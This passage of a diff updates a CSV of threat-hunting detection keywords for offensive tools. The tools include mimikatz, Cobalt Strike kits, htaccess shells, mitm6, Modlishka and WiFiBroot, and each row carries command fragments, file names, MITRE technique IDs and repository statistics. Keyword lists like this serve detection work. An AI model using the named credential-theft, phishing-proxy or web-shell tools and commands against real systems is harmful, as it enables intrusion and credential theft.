+"*misc::xor*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*miscbackdoorlnkhelp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*missile-command.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*mitm6 --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*mitm6 -d *","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1478","229","2022-07-05T09:47:15Z","2018-01-10T21:27:28Z" "*mitm6.py*","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","1478","229","2022-07-05T09:47:15Z","2018-01-10T21:27:28Z" "*mitmdump -*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*mitmdump -s aerosol.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*MITMf.py*","offensive_tool_keyword","MITMf","Framework for Man-In-The-Middle attacks","T1557 - T1192 - T1173 - T1185","TA0001 - TA0011 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/MITMf","1","1","N/A","N/A","10","3480","1090","2018-08-28T15:44:25Z","2014-07-07T11:13:51Z" -"*mitmproxy*","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","N/A","N/A","10","32405","3799","2023-10-02T22:25:26Z","2010-02-16T04:10:13Z" +"*mitmproxy*","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","N/A","N/A","10","32422","3800","2023-10-02T22:25:26Z","2010-02-16T04:10:13Z" "*mitmsocks*","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","0","N/A","N/A","1","30","9","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" "*mitmsocks4j*","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy for Java","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","1","N/A","N/A","1","30","9","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z" -"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","10","14942","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" -"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14942","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" -"*MockDirUACBypass*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*Mobile-Security-Framework*","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Frameworks","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","10","14948","3006","2023-10-03T20:48:09Z","2015-01-31T04:36:01Z" +"*MockDirUACBypass*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*MockDirUACBypassDll*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*Mockingjay_BOF.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*Mockingjay_BOF-main*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*mod_auth_remote.phish.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" -"*mod_buster.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*mod_buster.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*mod_caucho.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.bash.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.bind.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_cgi.shell.windows.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_mono.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_multi.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" -"*mod_nikto.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*mod_nikto.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*mod_perl.embperl.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.IPP.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_perl.Mason.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" @@ -13668,8 +13826,8 @@ "*mod_rivet.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_ruby.shell.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*mod_sendmail.rce.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" -"*mod_shellshock.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*mod_wp_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*mod_shellshock.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*mod_wp_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*modDetective*","offensive_tool_keyword","modDetective","modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.","T1003 - T1036 - T1057","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/itsKindred/modDetective","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" @@ -13680,127 +13838,129 @@ "*--mode proxy --action prototypes --path *prototypes.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "*--mode proxy --dll *.dll*--external-resources*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "*--mode proxy --ghidra *--dll *","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"*ModifiedVulnerableBinaryFormatters\info.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*Modlishka/config*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" -"*MODLISHKA_BIN*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" -"*Modlishka-linux-amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" -"*Modlishka-windows-*-amd64.exe*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*ModifiedVulnerableBinaryFormatters\info.txt*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*Modlishka/config*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*MODLISHKA_BIN*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*Modlishka-linux-amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*Modlishka-windows-*-amd64.exe*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" "*module inject *","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*modules*daclread.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*modules*daclread.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*modules/enumrate.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" -"*modules/exploits/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*modules/exploits/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*modules/exploits/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*modules/exploits/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*mogwailabs*","offensive_tool_keyword","Github Username","MOGWAI LABS is an infosec boutique with a strong emphasis on offensive security github repo hosting offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mogwailabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mojo.5688.8052.183894939787088877##*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","pipe name","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*mojo.5688.8052.35780273329370473##*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike 